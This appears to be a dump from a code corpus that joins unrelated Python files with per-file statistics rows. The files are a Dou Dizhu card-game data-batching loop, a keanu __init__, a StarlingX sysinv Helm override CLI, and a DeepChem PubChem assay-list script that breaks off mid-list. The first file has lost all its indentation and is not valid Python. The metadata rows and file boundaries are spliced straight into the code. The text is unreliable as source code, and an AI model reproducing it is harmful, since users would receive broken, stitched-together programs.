cards_landlord = split_handcards(cards_landlord)
cards_landlord_down = split_handcards(cards_landlord_down)
cards_landlord_up = split_handcards(cards_landlord_up)
cards_landlord_public = split_handcards(cards_landlord_public)
# convert list to binary numpy array
cards_landlord_array = \
cards_rank_encode(cards_landlord)
cards_landlord_down_array = \
cards_rank_encode(cards_landlord_down)
cards_landlord_up_array = \
cards_rank_encode(cards_landlord_up)
cards_landlord_public_array = \
cards_rank_encode(cards_landlord_public)
# Add Pass to the Game Process
(landlord_game, landlord_down_game,
landlord_up_game) = game_process_with_pass(game_process)
(all_data, all_label, all_label_index,
all_sa_pair, all_sa_label) = generate_game_process(
cards_landlord, cards_landlord_down, cards_landlord_up,
cards_landlord_public, game_process, str(opt.personID)
)
if all_sa_pair == []:
continue
# NOTE: Processing the binary state numpy ndarray without action
# if not np_array_flag:
# # Read a new line of game process after reach or exceed 500
# # or fresh start
# if np_array_data_left is None:
# np_array_data = np.stack(all_data, axis=0)
# np_array_label = np.stack(all_label_index, axis=0)
# else:
# current_data = np.stack(all_data, axis=0)
# current_label = np.stack(all_label_index, axis=0)
# np_array_data = np.concatenate(
# (np_array_data_left, current_data), axis=0
# )
# np_array_label = np.concatenate(
# (np_array_label_left, current_label), axis=0
# )
# np_array_data_left = None
# np_array_label_left = None
# np_array_flag = True
# else:
# current_data = np.stack(all_data, axis=0)
# current_label = np.stack(all_label_index, axis=0)
# if np_array_data.shape[0] + current_data.shape[0] > 500:
# overflow_length = (
# np_array_data.shape[0] + current_data.shape[0] - 500)
# concat_length = current_data.shape[0] - overflow_length
# np_array_data = np.concatenate(
# (np_array_data, current_data[0:concat_length]),
# axis=0
# )
# np_array_label = np.concatenate(
# (np_array_label, current_label[0:concat_length]),
# axis=0
# )
# print(
# 'save {} piece of data. '
# 'State Shape: {}, Label Shape: {}'
# .format(
# cnt_npy, np_array_data.shape, np_array_label.shape)
# )
# np.save(
# os.path.join(
# opt.save_dir, 'data', 'all_state_%d' % cnt_npy),
# np_array_data)
# np.save(
# os.path.join(
# opt.save_dir, 'label', 'all_label_%d' % cnt_npy),
# np_array_label)
# cnt_npy += 1
# np_array_data_left = current_data[concat_length:]
# np_array_label_left = current_label[concat_length:]
# np_array_data = None
# np_array_label = None
# np_array_flag = False
# elif np_array_data.shape[0] + current_data.shape[0] == 500:
# # save to .npy file, clear buffer
# np_array_data = np.concatenate(
# (np_array_data, current_data), axis=0
# )
# np_array_label = np.concatenate(
# (np_array_label, current_label), axis=0
# )
# print(
# 'save {} piece of data. '
# 'State Shape: {}, Label Shape: {}'
# .format(
# cnt_npy, np_array_data.shape, np_array_label.shape)
# )
# np.save(
# os.path.join(
# opt.save_dir, 'data', 'all_state_%d' % cnt_npy),
# np_array_data)
# np.save(
# os.path.join(
# opt.save_dir, 'label', 'all_label_%d' % cnt_npy),
# np_array_label)
# cnt_npy += 1
# np_array_data_left = None
# np_array_label_left = None
# np_array_data = None
# np_array_label = None
# np_array_flag = False
# else:
# # concat, keep moving
# np_array_data = np.concatenate(
# (np_array_data, current_data), axis=0
# )
# np_array_label = np.concatenate(
# (np_array_label, current_label), axis=0
# )
# NOTE: Processing the (state,action) pair
if not np_sa_flag:
# Read a new line of game process after reach or exceed 500
# or fresh start
if np_sa_data_left is None:
if all_sa_pair == []:
pass
else:
try:
np_sa_data = np.stack(all_sa_pair, axis=0)
np_sa_label = np.stack(all_sa_label, axis=0)
except ValueError:
print(
'sa_pair: {}, sa_label: {}'
.format(all_sa_pair, all_sa_label)
)
else:
if all_sa_pair == []:
pass
else:
try:
current_sa_data = np.stack(all_sa_pair, axis=0)
current_sa_label = np.stack(all_sa_label, axis=0)
except ValueError:
print(
'sa_pair: {}, sa_label: {}'
.format(all_sa_pair, all_sa_label)
)
np_sa_data = np.concatenate(
(np_sa_data_left, current_sa_data), axis=0
)
np_sa_label = np.concatenate(
(np_sa_label_left, current_sa_label), axis=0
)
np_sa_data_left = None
np_sa_label_left = None
np_sa_flag = True
else:
if all_sa_pair == []:
# NOTE: Modified later
continue
else:
current_sa_data = np.stack(all_sa_pair, axis=0)
current_sa_label = np.stack(all_sa_label, axis=0)
if np_sa_data is None:
pass
elif np_sa_data.shape[0] > 500:
overflow_length = (
np_sa_data.shape[0] - 500)
concat_length = 500
print(
'save {} piece of (state, action) data. (early 500)'
'State-Action Shape: {}, Label Shape: {}'
.format(
cnt_sa_npy, np_sa_data[0:500].shape,
np_sa_label[0:500].shape
)
)
np.save(
os.path.join(
opt.save_dir, 'data',
'all_sa_%d' % cnt_sa_npy
), np_sa_data[0:500]
)
np.save(
os.path.join(
opt.save_dir, 'label',
'all_sa_label_%d' % cnt_sa_npy
), np_sa_label[0:500]
)
cnt_sa_npy += 1
np_sa_data_left = np.concatenate(
(np_sa_data[500:], current_sa_data),
axis=0
)
np_sa_label_left = np.concatenate(
(np_sa_label[500:], current_sa_label),
axis=0
)
np_sa_data = None
np_sa_label = None
np_sa_flag = False
elif np_sa_data.shape[0] + current_sa_data.shape[0] > 500:
overflow_length = (
np_sa_data.shape[0] + current_sa_data.shape[0] - 500)
concat_length = current_sa_data.shape[0] - overflow_length
np_sa_data = np.concatenate(
(np_sa_data, current_sa_data[0:concat_length]),
axis=0
)
np_sa_label = np.concatenate(
(np_sa_label, current_sa_label[0:concat_length]),
axis=0
)
print(
'save {} piece of (state,action) data. (>500)'
'State-Action Shape: {}, Label Shape: {}'
.format(
cnt_sa_npy, np_sa_data.shape, np_sa_label.shape
)
)
if (np_sa_data.shape[0] != 500):
raise ValueError(
'the shape of each saved .npy file should be 500 '
'Got: {}'
.format(np_sa_data.shape)
)
np.save(
os.path.join(
opt.save_dir, 'data', 'all_sa_%d' % cnt_sa_npy
), np_sa_data
)
np.save(
os.path.join(
opt.save_dir, 'label',
'all_sa_label_%d' % cnt_sa_npy
), np_sa_label
)
cnt_sa_npy += 1
np_sa_data_left = current_sa_data[concat_length:]
np_sa_label_left = current_sa_label[concat_length:]
np_sa_data = None
np_sa_label = None
np_sa_flag = False
elif np_sa_data.shape[0] + current_sa_data.shape[0] == 500:
# save to .npy file, clear buffer
np_sa_data = np.concatenate(
(np_sa_data, current_sa_data), axis=0
)
np_sa_label = np.concatenate(
(np_sa_label, current_sa_label), axis=0
)
print(
'save {} piece of (state,action) data. '
'State-Action Shape: {}, Label Shape: {}'
.format(
cnt_sa_npy, np_sa_data.shape, np_sa_label.shape
)
)
np.save(
os.path.join(
opt.save_dir, 'data', 'all_sa_%d' % cnt_sa_npy
), np_sa_data
)
np.save(
os.path.join(
opt.save_dir, 'label', 'all_label_%d' % cnt_sa_npy
), np_sa_label
)
cnt_sa_npy += 1
np_sa_data_left = None
np_sa_label_left = None
np_sa_data = None
np_sa_label = None
np_sa_flag = False
else:
# concat, keep moving
np_sa_data = np.concatenate(
(np_sa_data, current_sa_data), axis=0
)
np_sa_label = np.concatenate(
(np_sa_label, current_sa_label), axis=0
)
# Finished the loop, write the data in the buffer to file
# if np_array_flag:
# if np_array_data is None and np_array_data_left is not None:
# print(
# 'save {} piece of data. '
# 'State Shape: {}, Label Shape: {}'
# .format(
# cnt_npy, np_array_data_left.shape,
# np_array_label_left.shape)
# )
# np.save(
# os.path.join(
# opt.save_dir, 'data', 'all_state_%d' % cnt_npy),
# np_array_data_left)
# np.save(
# os.path.join(
# opt.save_dir, 'label', 'all_label_%d' % cnt_npy),
# np_array_label_left)
# elif np_array_data is not None:
# print(
# 'save {} piece of data. '
# 'State Shape: {}, Label Shape: {}'
# .format(
# cnt_npy, np_array_data.shape, np_array_label.shape)
# )
# np.save(
# os.path.join(
# opt.save_dir, 'data', 'all_state_%d' % cnt_npy),
# np_array_data)
# np.save(
# os.path.join(
# opt.save_dir, 'label', 'all_label_%d' % cnt_npy),
# np_array_label)
if np_sa_flag:
if np_sa_data is None and np_sa_data_left is not None:
print(
'save {} piece of (state, action) pair data. '
'State-Action Shape: {}, Label Shape: {}'
.format(
cnt_sa_npy, np_sa_data_left.shape,
np_sa_label_left.shape
)
)
np.save(
os.path.join(
opt.save_dir, 'data', 'all_sa_%d' % cnt_sa_npy
), np_sa_data_left
)
np.save(
os.path.join(
opt.save_dir, 'label', 'all_label_%d' % cnt_sa_npy
), np_sa_label_left
)
elif np_sa_data is not None:
print(
'save {} piece of (state, action) pair data. '
'State-Action Shape: {}, Label Shape: {}'
.format(
cnt_sa_npy, np_sa_data.shape, np_sa_label.shape
)
)
np.save(
os.path.join(
opt.save_dir, 'data', 'all_sa_%d' % cnt_sa_npy
), np_sa_data
)
np.save(
os.path.join(
opt.save_dir, 'label', 'all_sa_label_%d' % cnt_sa_npy
), np_sa_label
)
print('Finished! Total Records: {}'.format(cnt_line))
| 39.374226 | 82 | 0.504752 | 12,295 | 101,743 | 3.866694 | 0.039284 | 0.074588 | 0.041901 | 0.057571 | 0.817736 | 0.787573 | 0.752971 | 0.724448 | 0.707516 | 0.668644 | 0 | 0.042613 | 0.403772 | 101,743 | 2,583 | 83 | 39.38947 | 0.74109 | 0.144885 | 0 | 0.657172 | 0 | 0 | 0.030881 | 0 | 0 | 0 | 0 | 0.000774 | 0 | 1 | 0.009839 | false | 0.022786 | 0.004143 | 0.000518 | 0.062144 | 0.005179 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fbe8f91ffd900e96bf2bc0c56c62562e25ec9011 | 33 | py | Python | keanu-python/keanu/plots/__init__.py | bwplotka/keanu | 3afc576380fd30f7539b34b220bd89e68529b10e | [
"MIT"
] | 153 | 2018-04-06T13:30:31.000Z | 2022-01-31T10:05:27.000Z | keanu-python/keanu/plots/__init__.py | bwplotka/keanu | 3afc576380fd30f7539b34b220bd89e68529b10e | [
"MIT"
] | 168 | 2018-04-06T16:37:33.000Z | 2021-09-27T21:43:54.000Z | keanu-python/keanu/plots/__init__.py | bwplotka/keanu | 3afc576380fd30f7539b34b220bd89e68529b10e | [
"MIT"
] | 46 | 2018-04-10T10:46:01.000Z | 2022-02-24T02:53:50.000Z | from .traceplot import traceplot
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2216c9a5bef96b21ad2dab2dc29c9553d55fc108 | 4,278 | py | Python | sysinv/sysinv/sysinv/sysinv/cmd/helm.py | albailey/config | 40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9 | [
"Apache-2.0"
] | 10 | 2020-02-07T18:57:44.000Z | 2021-09-11T10:29:34.000Z | sysinv/sysinv/sysinv/sysinv/cmd/helm.py | albailey/config | 40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9 | [
"Apache-2.0"
] | 1 | 2021-01-14T12:01:55.000Z | 2021-01-14T12:01:55.000Z | sysinv/sysinv/sysinv/sysinv/cmd/helm.py | albailey/config | 40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9 | [
"Apache-2.0"
] | 10 | 2020-10-13T08:37:46.000Z | 2022-02-09T00:21:25.000Z | #!/usr/bin/env python
#
# Copyright (c) 2021 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
"""
System Inventory Helm Utility.
"""
import sys
from oslo_config import cfg
from oslo_log import log
from sysinv.common import constants
from sysinv.common import exception
from sysinv.common import service
from sysinv.conductor import kube_app
from sysinv.db import api
from sysinv.helm import helm
CONF = cfg.CONF
LOG = log.getLogger(__name__)
def create_app_overrides_action(path, app_name=None, namespace=None):
dbapi = api.get_instance()
try:
db_app = dbapi.kube_app_get(app_name)
except exception.KubeAppNotFound:
LOG.info("Application %s not found" % app_name)
return
helm_operator = helm.HelmOperator(dbapi=dbapi)
app_operator = kube_app.AppOperator(dbapi, helm_operator, {})
if not app_operator.app_has_system_plugins(db_app):
LOG.info("Overrides generation for application %s is "
"not supported via this command." % app_name)
else:
if db_app.status == constants.APP_UPLOAD_SUCCESS:
app_operator.activate_app_plugins(db_app)
helm_operator.generate_helm_application_overrides(
path, app_name, mode=None, cnamespace=namespace)
app_operator.deactivate_app_plugins(db_app)
else:
helm_operator.generate_helm_application_overrides(
path, app_name, mode=None, cnamespace=namespace)
def create_armada_app_overrides_action(path, app_name=None, namespace=None):
dbapi = api.get_instance()
try:
db_app = dbapi.kube_app_get(app_name)
except exception.KubeAppNotFound:
LOG.info("Application %s not found" % app_name)
return
helm_operator = helm.HelmOperator(dbapi=dbapi)
app_operator = kube_app.AppOperator(dbapi, helm_operator, {})
if not app_operator.app_has_system_plugins(db_app):
LOG.info("Overrides generation for application %s is "
"not supported via this command." % app_name)
else:
if db_app.status == constants.APP_UPLOAD_SUCCESS:
app_operator.activate_app_plugins(db_app)
helm_operator.generate_helm_application_overrides(
path, app_name, mode=None, cnamespace=namespace,
armada_format=True, armada_chart_info=None, combined=False)
app_operator.deactivate_app_plugins(db_app)
else:
helm_operator.generate_helm_application_overrides(
path, app_name, mode=None, cnamespace=namespace,
armada_format=True, armada_chart_info=None, combined=False)
def add_action_parsers(subparsers):
parser = subparsers.add_parser('create-app-overrides')
parser.set_defaults(func=create_app_overrides_action)
parser.add_argument('path', nargs='?')
parser.add_argument('app_name', nargs='?')
parser.add_argument('namespace', nargs='?')
parser = subparsers.add_parser('create-armada-app-overrides')
parser.set_defaults(func=create_armada_app_overrides_action)
parser.add_argument('path', nargs='?')
parser.add_argument('app_name', nargs='?')
parser.add_argument('namespace', nargs='?')
CONF.register_cli_opt(
cfg.SubCommandOpt('action',
title='actions',
help='Perform helm override operation',
handler=add_action_parsers))
def main():
service.prepare_service(sys.argv)
if CONF.action.name == 'create-app-overrides':
if not CONF.action.path:
LOG.error("overrides path is required")
elif not CONF.action.app_name:
LOG.error("application name is required")
else:
CONF.action.func(CONF.action.path,
CONF.action.app_name,
CONF.action.namespace)
elif CONF.action.name == 'create-armada-app-overrides':
if not CONF.action.path:
LOG.error("overrides path is required")
elif not CONF.action.app_name:
LOG.error("application name is required")
else:
CONF.action.func(CONF.action.path,
CONF.action.app_name,
CONF.action.namespace)
| 34.5 | 76 | 0.665264 | 523 | 4,278 | 5.200765 | 0.217973 | 0.046324 | 0.024265 | 0.022059 | 0.781618 | 0.752206 | 0.752206 | 0.723529 | 0.723529 | 0.723529 | 0 | 0.001847 | 0.240767 | 4,278 | 123 | 77 | 34.780488 | 0.835591 | 0.030622 | 0 | 0.703297 | 0 | 0 | 0.118529 | 0.013062 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043956 | false | 0 | 0.098901 | 0 | 0.164835 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22351743a8b3651b5c0bcd9dd510d1521f4811b4 | 39,119 | py | Python | contrib/pubchem_dataset/create_assay_overview.py | cjgalvin/deepchem | 64993a129e7f0f78fed9500298b1828ac8a0757a | [
"MIT"
] | 3,782 | 2016-02-21T03:53:11.000Z | 2022-03-31T16:10:26.000Z | contrib/pubchem_dataset/create_assay_overview.py | cjgalvin/deepchem | 64993a129e7f0f78fed9500298b1828ac8a0757a | [
"MIT"
] | 2,666 | 2016-02-11T01:54:54.000Z | 2022-03-31T11:14:33.000Z | contrib/pubchem_dataset/create_assay_overview.py | cjgalvin/deepchem | 64993a129e7f0f78fed9500298b1828ac8a0757a | [
"MIT"
] | 1,597 | 2016-02-21T03:10:08.000Z | 2022-03-30T13:21:28.000Z | import pandas as pd
import os
import pickle
import array
from bisect import bisect_left
import gzip
import time
import shutil
import deepchem
import requests
import argparse
import numpy as np
data_dir = deepchem.utils.get_data_dir()
sdf_dir = os.path.join(data_dir, "Data")
class PCBADatsetBuilder:
def __init__(self):
self.pcba_128_assay_list = "PCBA-1030,PCBA-1379,PCBA-1452,PCBA-1454,PCBA-1457,PCBA-1458,PCBA-1460,PCBA-1461,PCBA-1468,PCBA-1469,PCBA-1471,PCBA-1479,PCBA-1631,PCBA-1634,PCBA-1688,PCBA-1721,PCBA-2100,PCBA-2101,PCBA-2147,PCBA-2242,PCBA-2326,PCBA-2451,PCBA-2517,PCBA-2528,PCBA-2546,PCBA-2549,PCBA-2551,PCBA-2662,PCBA-2675,PCBA-2676,PCBA-411,PCBA-463254,PCBA-485281,PCBA-485290,PCBA-485294,PCBA-485297,PCBA-485313,PCBA-485314,PCBA-485341,PCBA-485349,PCBA-485353,PCBA-485360,PCBA-485364,PCBA-485367,PCBA-492947,PCBA-493208,PCBA-504327,PCBA-504332,PCBA-504333,PCBA-504339,PCBA-504444,PCBA-504466,PCBA-504467,PCBA-504706,PCBA-504842,PCBA-504845,PCBA-504847,PCBA-504891,PCBA-540276,PCBA-540317,PCBA-588342,PCBA-588453,PCBA-588456,PCBA-588579,PCBA-588590,PCBA-588591,PCBA-588795,PCBA-588855,PCBA-602179,PCBA-602233,PCBA-602310,PCBA-602313,PCBA-602332,PCBA-624170,PCBA-624171,PCBA-624173,PCBA-624202,PCBA-624246,PCBA-624287,PCBA-624288,PCBA-624291,PCBA-624296,PCBA-624297,PCBA-624417,PCBA-651635,PCBA-651644,PCBA-651768,PCBA-651965,PCBA-652025,PCBA-652104,PCBA-652105,PCBA-652106,PCBA-686970,PCBA-686978,PCBA-686979,PCBA-720504,PCBA-720532,PCBA-720542,PCBA-720551,PCBA-720553,PCBA-720579,PCBA-720580,PCBA-720707,PCBA-720708,PCBA-720709,PCBA-720711,PCBA-743255,PCBA-743266,PCBA-875,PCBA-881,PCBA-883,PCBA-884,PCBA-885,PCBA-887,PCBA-891,PCBA-899,PCBA-902,PCBA-903,PCBA-904,PCBA-912,PCBA-914,PCBA-915,PCBA-924,PCBA-925,PCBA-926,PCBA-927,PCBA-938,PCBA-995".split(
',')
self.pcba_146_assay_list = "PCBA-1030,PCBA-1379,PCBA-1452,PCBA-1454,PCBA-1457,PCBA-1458,PCBA-1460,PCBA-1461,PCBA-1468,PCBA-1469,PCBA-1471,PCBA-1479,PCBA-1631,PCBA-1634,PCBA-1688,PCBA-1721,PCBA-2100,PCBA-2101,PCBA-2147,PCBA-2242,PCBA-2326,PCBA-2451,PCBA-2517,PCBA-2528,PCBA-2546,PCBA-2549,PCBA-2551,PCBA-2662,PCBA-2675,PCBA-2676,PCBA-411,PCBA-463254,PCBA-485281,PCBA-485290,PCBA-485294,PCBA-485297,PCBA-485313,PCBA-485314,PCBA-485341,PCBA-485349,PCBA-485353,PCBA-485360,PCBA-485364,PCBA-485367,PCBA-492947,PCBA-493208,PCBA-504327,PCBA-504332,PCBA-504333,PCBA-504339,PCBA-504444,PCBA-504466,PCBA-504467,PCBA-504706,PCBA-504842,PCBA-504845,PCBA-504847,PCBA-504891,PCBA-540276,PCBA-540317,PCBA-588342,PCBA-588453,PCBA-588456,PCBA-588579,PCBA-588590,PCBA-588591,PCBA-588795,PCBA-588855,PCBA-602179,PCBA-602233,PCBA-602310,PCBA-602313,PCBA-602332,PCBA-624170,PCBA-624171,PCBA-624173,PCBA-624202,PCBA-624246,PCBA-624287,PCBA-624288,PCBA-624291,PCBA-624296,PCBA-624297,PCBA-624417,PCBA-651635,PCBA-651644,PCBA-651768,PCBA-651965,PCBA-652025,PCBA-652104,PCBA-652105,PCBA-652106,PCBA-686970,PCBA-686978,PCBA-686979,PCBA-720504,PCBA-720532,PCBA-720542,PCBA-720551,PCBA-720553,PCBA-720579,PCBA-720580,PCBA-720707,PCBA-720708,PCBA-720709,PCBA-720711,PCBA-743255,PCBA-743266,PCBA-875,PCBA-881,PCBA-883,PCBA-884,PCBA-885,PCBA-887,PCBA-891,PCBA-899,PCBA-902,PCBA-903,PCBA-904,PCBA-912,PCBA-914,PCBA-915,PCBA-924,PCBA-925,PCBA-926,PCBA-927,PCBA-938,PCBA-995,PCBA-686971,PCBA-504834,PCBA-588856,PCBA-720533,PCBA-1865,PCBA-651820,PCBA-923,PCBA-493014,PCBA-504648,PCBA-624418,PCBA-1159614,PCBA-2289,PCBA-1159524,PCBA-1463,PCBA-504832,PCBA-540256,PCBA-485298,PCBA-2685".split(
',')
self.pcba_2475_assay_list = "PCBA-1259344,PCBA-588834,PCBA-1159536,PCBA-1259321,PCBA-1259320,PCBA-1259256,PCBA-1259255,PCBA-1259253,PCBA-1259252,PCBA-1159605,PCBA-1159604,PCBA-1259244,PCBA-1259243,PCBA-1259242,PCBA-1259241,PCBA-720687,PCBA-720675,PCBA-720674,PCBA-1224890,PCBA-1224889,PCBA-1224888,PCBA-1224887,PCBA-1224886,PCBA-1224885,PCBA-1224884,PCBA-1224883,PCBA-1224882,PCBA-1224881,PCBA-1224880,PCBA-1224879,PCBA-1224878,PCBA-1224877,PCBA-1224876,PCBA-1224875,PCBA-1224874,PCBA-1224873,PCBA-1224872,PCBA-1224871,PCBA-1224870,PCBA-1224869,PCBA-1224868,PCBA-1224867,PCBA-1224862,PCBA-1224861,PCBA-1224860,PCBA-1224859,PCBA-1224858,PCBA-1224857,PCBA-1224856,PCBA-1224855,PCBA-1224854,PCBA-1224853,PCBA-1224863,PCBA-1224847,PCBA-1224846,PCBA-1224845,PCBA-1224844,PCBA-1224843,PCBA-1224839,PCBA-1224838,PCBA-1224837,PCBA-1224836,PCBA-1224835,PCBA-1224823,PCBA-1224822,PCBA-1224821,PCBA-1224820,PCBA-1224819,PCBA-1224818,PCBA-1159614,PCBA-1159513,PCBA-1159512,PCBA-1159511,PCBA-1159510,PCBA-1382,PCBA-1159577,PCBA-1159574,PCBA-1159573,PCBA-1159572,PCBA-1159571,PCBA-1159570,PCBA-1159569,PCBA-1159568,PCBA-1159567,PCBA-1159566,PCBA-1117284,PCBA-1159553,PCBA-1159552,PCBA-1159551,PCBA-1117274,PCBA-1117272,PCBA-1117271,PCBA-720691,PCBA-1053202,PCBA-1159529,PCBA-1159527,PCBA-1053204,PCBA-1053203,PCBA-1159526,PCBA-1159525,PCBA-1159524,PCBA-1117265,PCBA-1053181,PCBA-1159521,PCBA-1159520,PCBA-1053169,PCBA-1053167,PCBA-1159517,PCBA-1159516,PCBA-1159515,PCBA-1053141,PCBA-1053140,PCBA-1053134,PCBA-1053132,PCBA-1053121,PCBA-1053120,PCBA-977620,PCBA-977612,PCBA-977609,PCBA-977617,PCBA-977616,PCBA-977615,PCBA-743509,PCBA-743507,PCBA-743497,PCBA-743483,PCBA-743481,PCBA-743440,PCBA-743417,PCBA-743413,PCBA-743403,PCBA-743399,PCBA-743381,PCBA-743434,PCBA-743422,PCBA-743373,PCBA-1117362,PCBA-1117361,PCBA-1117358,PCBA-1117359,PCBA-743372,PCBA-743296,PCBA-743284,PCBA-743425,PCBA-743234,PCBA-743231,PCBA-743229,PCBA-743450,PCBA-743423,PCBA-743404,PCBA-743400,PCBA-743389,PCBA-743384,PCBA-743186,PCBA-743183,PCBA-743175,PCBA-743181,PCBA-743172,PCBA-743167,PCBA-1117295,PCBA-743154,PCBA-743153,PCBA-743125,PCBA-743124,PCBA-743408,PCBA-743360,PCBA-743357,PCBA-743316,PCBA-743312,PCBA-743311,PCBA-743308,PCBA-743307,PCBA-743305,PCBA-743304,PCBA-743303,PCBA-743302,PCBA-743298,PCBA-743159,PCBA-743131,PCBA-743129,PCBA-743128,PCBA-743123,PCBA-743095,PCBA-720728,PCBA-743115,PCBA-743111,PCBA-743104,PCBA-743102,PCBA-743097,PCBA-743068,PCBA-743062,PCBA-743022,PCBA-743026,PCBA-743016,PCBA-720715,PCBA-720714,PCBA-720696,PCBA-720695,PCBA-720673,PCBA-720672,PCBA-720671,PCBA-720651,PCBA-720649,PCBA-743195,PCBA-743187,PCBA-743179,PCBA-743178,PCBA-743171,PCBA-743170,PCBA-743161,PCBA-1117277,PCBA-743083,PCBA-720622,PCBA-743225,PCBA-743224,PCBA-743223,PCBA-743222,PCBA-743221,PCBA-743220,PCBA-743218,PCBA-743217,PCBA-743215,PCBA-743213,PCBA-743212,PCBA-743211,PCBA-743210,PCBA-743209,PCBA-743203,PCBA-743202,PCBA-743194,PCBA-743191,PCBA-743094,PCBA-743086,PCBA-743085,PCBA-743084,PCBA-743081,PCBA-720590,PCBA-743080,PCBA-743079,PCBA-743075,PCBA-743074,PCBA-743069,PCBA-743066,PCBA-743065,PCBA-743064,PCBA-743042,PCBA-743041,PCBA-743040,PCBA-743036,PCBA-743035,PCBA-743033,PCBA-743015,PCBA-743014,PCBA-743012,PCBA-720693,PCBA-720692,PCBA-720686,PCBA-720685,PCBA-720684,PCBA-720683,PCBA-720682,PCBA-720681,PCBA-720680,PCBA-720679,PCBA-720678,PCBA-720635,PCBA-720634,PCBA-651634,PCBA-651633,PCBA-651632,PCBA-651631,PCBA-743110,PCBA-743058,PCBA-743057,PCBA-743056,PCBA-743055,PCBA-1053205,PCBA-720595,PCBA-720593,PCBA-720568,PCBA-720567,PCBA-720562,PCBA-1053185,PCBA-1053184,PCBA-1053183,PCBA-1053174,PCBA-1053173,PCBA-651917,PCBA-651734,PCBA-624284,PCBA-624063,PCBA-602455,PCBA-602241,PCBA-624078,PCBA-1053144,PCBA-1053143,PCBA-743244,PCBA-743146,PCBA-743142,PCBA-1053127,PCBA-1053126,PCBA-1053125,PCBA-1053124,PCBA-1053122,PCBA-1053119,PCBA-1053118,PCBA-1053117,PCBA-1053115,PCBA-1035475,PCBA-686993,PCBA-743342,PCBA-977607,PCBA-977606,PCBA-977605,PCBA-686969,PCBA-686967,PCBA-686962,PCBA-686961,PCBA-623995,PCBA-743479,PCBA-743478,PCBA-743477,PCBA-743472,PCBA-743471,PCBA-743470,PCBA-743464,PCBA-743453,PCBA-743452,PCBA-743441,PCBA-743446,PCBA-743444,PCBA-743416,PCBA-743415,PCBA-743412,PCBA-743402,PCBA-743396,PCBA-743395,PCBA-743394,PCBA-686932,PCBA-686917,PCBA-686916,PCBA-686915,PCBA-652285,PCBA-652283,PCBA-652282,PCBA-652276,PCBA-743327,PCBA-743326,PCBA-743325,PCBA-652250,PCBA-652227,PCBA-743343,PCBA-743341,PCBA-743340,PCBA-743329,PCBA-652222,PCBA-652198,PCBA-652196,PCBA-743339,PCBA-652207,PCBA-743336,PCBA-652179,PCBA-652170,PCBA-652287,PCBA-652286,PCBA-652165,PCBA-652161,PCBA-743319,PCBA-743317,PCBA-743314,PCBA-652177,PCBA-652265,PCBA-652123,PCBA-652112,PCBA-743297,PCBA-743295,PCBA-743294,PCBA-743293,PCBA-743292,PCBA-743291,PCBA-743288,PCBA-2675,PCBA-743049,PCBA-652060,PCBA-652059,PCBA-720608,PCBA-720605,PCBA-720624,PCBA-720607,PCBA-720602,PCBA-720598,PCBA-743276,PCBA-743275,PCBA-743197,PCBA-743150,PCBA-743149,PCBA-743145,PCBA-743144,PCBA-743048,PCBA-743047,PCBA-743046,PCBA-743045,PCBA-743044,PCBA-743043,PCBA-743021,PCBA-743020,PCBA-519,PCBA-743267,PCBA-743266,PCBA-652173,PCBA-489002,PCBA-720701,PCBA-743262,PCBA-743260,PCBA-743259,PCBA-652172,PCBA-743255,PCBA-743254,PCBA-651977,PCBA-651976,PCBA-489003,PCBA-743245,PCBA-652046,PCBA-652043,PCBA-624288,PCBA-651913,PCBA-651912,PCBA-720726,PCBA-652289,PCBA-720727,PCBA-651875,PCBA-651872,PCBA-651855,PCBA-651853,PCBA-651849,PCBA-651842,PCBA-651874,PCBA-651862,PCBA-743059,PCBA-651790,PCBA-651788,PCBA-652183,PCBA-652180,PCBA-652175,PCBA-651775,PCBA-651920,PCBA-651996,PCBA-743019,PCBA-652164,PCBA-652140,PCBA-720729,PCBA-686933,PCBA-651753,PCBA-652211,PCBA-652194,PCBA-720724,PCBA-720711,PCBA-720709,PCBA-720708,PCBA-720707,PCBA-651760,PCBA-720697,PCBA-720690,PCBA-652077,PCBA-652034,PCBA-652033,PCBA-652032,PCBA-651676,PCBA-651670,PCBA-720659,PCBA-720653,PCBA-720652,PCBA-720650,PCBA-720646,PCBA-720645,PCBA-720512,PCBA-720636,PCBA-720632,PCBA-651947,PCBA-651605,PCBA-651642,PCBA-720597,PCBA-720591,PCBA-720589,PCBA-720588,PCBA-720587,PCBA-720586,PCBA-720584,PCBA-720579,PCBA-720580,PCBA-720578,PCBA-720577,PCBA-720576,PCBA-720575,PCBA-720573,PCBA-720572,PCBA-624496,PCBA-624495,PCBA-720569,PCBA-720537,PCBA-720570,PCBA-720564,PCBA-687026,PCBA-687023,PCBA-686931,PCBA-686930,PCBA-686929,PCBA-686928,PCBA-652239,PCBA-624500,PCBA-624460,PCBA-651841,PCBA-651816,PCBA-720565,PCBA-720553,PCBA-720551,PCBA-687040,PCBA-651837,PCBA-651836,PCBA-651809,PCBA-624473,PCBA-624458,PCBA-720548,PCBA-720542,PCBA-651835,PCBA-720538,PCBA-720534,PCBA-624439,PCBA-624425,PCBA-624410,PCBA-624409,PCBA-720541,PCBA